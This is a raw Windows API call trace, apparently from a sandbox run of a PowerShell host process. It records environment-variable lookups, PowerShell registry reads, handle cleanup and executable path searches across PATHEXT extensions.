	[0806.317] CoTaskMemFree (pv=0x43e820) 
	[0806.318] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0806.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.318] CoTaskMemFree (pv=0x43e820) 
	[0806.318] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0806.318] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.319] CoTaskMemFree (pv=0x43e820) 
	[0806.319] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0806.319] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.319] CoTaskMemFree (pv=0x43e820) 
	[0806.321] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0806.321] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.321] CoTaskMemFree (pv=0x43e820) 
	[0806.322] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0806.323] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x20db00 | out: lpMode=0x20db00) returned 1
	[0806.323] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0806.323] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.324] CoTaskMemFree (pv=0x43e820) 
	[0806.327] SetEvent (hEvent=0x31c) returned 1
	[0806.327] SetEvent (hEvent=0x38c) returned 1
	[0806.327] SetEvent (hEvent=0x314) returned 1
	[0806.327] SetEvent (hEvent=0x318) returned 1
	[0806.329] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0806.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0806.329] CoTaskMemFree (pv=0x43e820) 
	[0806.329] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d858 | out: phkResult=0x20d858*=0x34c) returned 0x0
	[0806.329] RegQueryValueExW (in: hKey=0x34c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x20d7dc, lpData=0x0, lpcbData=0x20d7d8*=0x0 | out: lpType=0x20d7dc*=0x0, lpData=0x0, lpcbData=0x20d7d8*=0x0) returned 0x2

Thread:
	id = 377
	os_tid = 0xa38


Thread:
	id = 378
	os_tid = 0xbbc


Thread:
	id = 1066
	os_tid = 0x1450


Thread:
	id = 1076
	os_tid = 0xb9c


Thread:
	id = 1095
	os_tid = 0x15f8


Thread:
	id = 1115
	os_tid = 0x1718


Thread:
	id = 1123
	os_tid = 0x192c

	[0566.277] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0643.153] RegCloseKey (hKey=0x2f8) returned 0x0
	[0643.153] RegCloseKey (hKey=0x300) returned 0x0
	[0643.153] RegCloseKey (hKey=0x2fc) returned 0x0
	[0749.087] LocalFree (hMem=0x4472e0) returned 0x0
	[0749.087] RegCloseKey (hKey=0x310) returned 0x0
	[0749.088] LocalFree (hMem=0x447290) returned 0x0
	[0749.088] CloseHandle (hObject=0x2f8) returned 1
	[0749.088] CloseHandle (hObject=0x13) returned 1
	[0749.089] CloseHandle (hObject=0xf) returned 1
	[0763.374] RegCloseKey (hKey=0x2f8) returned 0x0
	[0782.448] RegCloseKey (hKey=0x310) returned 0x0
	[0798.775] RegCloseKey (hKey=0x388) returned 0x0
	[0798.776] RegCloseKey (hKey=0x384) returned 0x0
	[0798.776] RegCloseKey (hKey=0x360) returned 0x0
	[0798.776] RegCloseKey (hKey=0x39c) returned 0x0
	[0798.777] RegCloseKey (hKey=0x37c) returned 0x0
	[0798.777] RegCloseKey (hKey=0x378) returned 0x0
	[0798.777] RegCloseKey (hKey=0x374) returned 0x0
	[0798.777] RegCloseKey (hKey=0x370) returned 0x0
	[0798.778] RegCloseKey (hKey=0x36c) returned 0x0
	[0798.778] RegCloseKey (hKey=0x368) returned 0x0
	[0798.778] RegCloseKey (hKey=0x364) returned 0x0
	[0798.778] RegCloseKey (hKey=0x33c) returned 0x0
	[0798.779] RegCloseKey (hKey=0x398) returned 0x0
	[0798.779] RegCloseKey (hKey=0x394) returned 0x0
	[0798.779] RegCloseKey (hKey=0x35c) returned 0x0
	[0798.779] RegCloseKey (hKey=0x358) returned 0x0
	[0798.780] RegCloseKey (hKey=0x354) returned 0x0
	[0798.780] RegCloseKey (hKey=0x350) returned 0x0
	[0798.780] RegCloseKey (hKey=0x34c) returned 0x0
	[0798.780] RegCloseKey (hKey=0x348) returned 0x0
	[0798.781] RegCloseKey (hKey=0x344) returned 0x0
	[0798.781] RegCloseKey (hKey=0x340) returned 0x0
	[0798.781] RegCloseKey (hKey=0x390) returned 0x0
	[0798.782] RegCloseKey (hKey=0x330) returned 0x0
	[0798.782] RegCloseKey (hKey=0x32c) returned 0x0
	[0798.782] RegCloseKey (hKey=0x328) returned 0x0
	[0798.782] RegCloseKey (hKey=0x324) returned 0x0
	[0798.783] RegCloseKey (hKey=0x320) returned 0x0
	[0798.783] RegCloseKey (hKey=0x31c) returned 0x0
	[0798.783] RegCloseKey (hKey=0x318) returned 0x0
	[0798.783] RegCloseKey (hKey=0x314) returned 0x0
	[0798.784] RegCloseKey (hKey=0x38c) returned 0x0
	[0798.784] RegCloseKey (hKey=0x310) returned 0x0
	[0828.677] RegCloseKey (hKey=0x34c) returned 0x0

Thread:
	id = 1183
	os_tid = 0xb74


Thread:
	id = 1710
	os_tid = 0x1fc4

	[0807.701] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0807.707] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0807.712] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0807.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.712] CoTaskMemFree (pv=0x43e820) 
	[0807.714] VirtualQuery (in: lpAddress=0x1c82da20, lpBuffer=0x1c82e8e0, dwLength=0x30 | out: lpBuffer=0x1c82e8e0*(BaseAddress=0x1c82d000, AllocationBase=0x1bea0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0807.717] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0807.717] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.717] CoTaskMemFree (pv=0x43e820) 
	[0807.720] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0807.720] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.720] CoTaskMemFree (pv=0x43e820) 
	[0807.723] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0807.724] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0807.724] CoTaskMemFree (pv=0x43e820) 
	[0808.402] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0808.402] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.402] CoTaskMemFree (pv=0x43e820) 
	[0808.405] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0808.405] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.405] CoTaskMemFree (pv=0x43e820) 
	[0808.406] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0808.406] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.407] CoTaskMemFree (pv=0x43e820) 
	[0808.412] VirtualQuery (in: lpAddress=0x1c82dcd0, lpBuffer=0x1c82eb90, dwLength=0x30 | out: lpBuffer=0x1c82eb90*(BaseAddress=0x1c82d000, AllocationBase=0x1bea0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0808.413] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0808.413] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.413] CoTaskMemFree (pv=0x43e820) 
	[0808.416] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0808.416] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.416] CoTaskMemFree (pv=0x43e820) 
	[0808.416] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0808.416] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.416] CoTaskMemFree (pv=0x43e820) 
	[0808.418] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0808.418] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.418] CoTaskMemFree (pv=0x43e820) 
	[0808.422] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0808.422] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0808.423] CoTaskMemFree (pv=0x43e820) 
	[0810.325] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0810.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0810.325] CoTaskMemFree (pv=0x43e820) 
	[0810.328] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0810.328] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0810.328] CoTaskMemFree (pv=0x43e820) 
	[0810.329] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0810.329] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0810.330] CoTaskMemFree (pv=0x43e820) 
	[0810.332] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0810.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0810.332] CoTaskMemFree (pv=0x43e820) 
	[0810.334] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0810.334] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0810.334] CoTaskMemFree (pv=0x43e820) 
	[0810.336] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0810.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0810.336] CoTaskMemFree (pv=0x43e820) 
	[0810.338] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0810.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0810.338] CoTaskMemFree (pv=0x43e820) 
	[0810.357] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0810.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0810.357] CoTaskMemFree (pv=0x43e820) 
	[0812.569] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0812.569] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0812.569] CoTaskMemFree (pv=0x43e820) 
	[0812.572] CoTaskMemAlloc (cb=0x104) returned 0x43e820
	[0812.572] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x43e820, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0812.572] CoTaskMemFree (pv=0x43e820) 
	[0812.572] CoTaskMemAlloc (cb=0x128) returned 0x440740
	[0812.573] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x440740, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0812.573] CoTaskMemFree (pv=0x440740) 
	[0813.972] CoTaskMemAlloc (cb=0x20e) returned 0x1b84c5e0
	[0813.972] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b84c5e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0813.972] CoTaskMemFree (pv=0x1b84c5e0) 
	[0813.977] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0813.978] SetErrorMode (uMode=0x1) returned 0x1
	[0813.982] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0813.993] SetErrorMode (uMode=0x1) returned 0x1
	[0813.997] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0813.997] SetErrorMode (uMode=0x1) returned 0x1
	[0813.998] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0814.006] SetErrorMode (uMode=0x1) returned 0x1
	[0814.008] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0814.008] SetErrorMode (uMode=0x1) returned 0x1
	[0814.008] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.311] SetErrorMode (uMode=0x1) returned 0x1
	[0815.313] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0815.313] SetErrorMode (uMode=0x1) returned 0x1
	[0815.313] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.321] SetErrorMode (uMode=0x1) returned 0x1
	[0815.323] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0815.323] SetErrorMode (uMode=0x1) returned 0x1
	[0815.323] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.331] SetErrorMode (uMode=0x1) returned 0x1
	[0815.333] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0815.333] SetErrorMode (uMode=0x1) returned 0x1
	[0815.333] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.607] SetErrorMode (uMode=0x1) returned 0x1
	[0816.608] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0816.609] SetErrorMode (uMode=0x1) returned 0x1
	[0816.609] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.617] SetErrorMode (uMode=0x1) returned 0x1
	[0816.618] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0816.619] SetErrorMode (uMode=0x1) returned 0x1
	[0816.619] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.627] SetErrorMode (uMode=0x1) returned 0x1
	[0816.628] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0816.629] SetErrorMode (uMode=0x1) returned 0x1
	[0816.629] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0816.637] SetErrorMode (uMode=0x1) returned 0x1
	[0816.639] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0816.639] SetErrorMode (uMode=0x1) returned 0x1
	[0816.639] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.203] SetErrorMode (uMode=0x1) returned 0x1
	[0818.204] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0818.204] SetErrorMode (uMode=0x1) returned 0x1
	[0818.204] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JSE", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.212] SetErrorMode (uMode=0x1) returned 0x1
	[0818.214] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0818.214] SetErrorMode (uMode=0x1) returned 0x1
	[0818.214] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSF", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.222] SetErrorMode (uMode=0x1) returned 0x1
	[0818.224] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0818.224] SetErrorMode (uMode=0x1) returned 0x1
	[0818.224] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.WSH", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0818.234] SetErrorMode (uMode=0x1) returned 0x1
	[0818.236] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0818.236] SetErrorMode (uMode=0x1) returned 0x1
	[0818.236] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.MSC", lpFindFileData=0x1c82dc00 | out: lpFindFileData=0x1c82dc00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0819.526] SetErrorMode (uMode=0x1) returned 0x1
	[0819.527] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
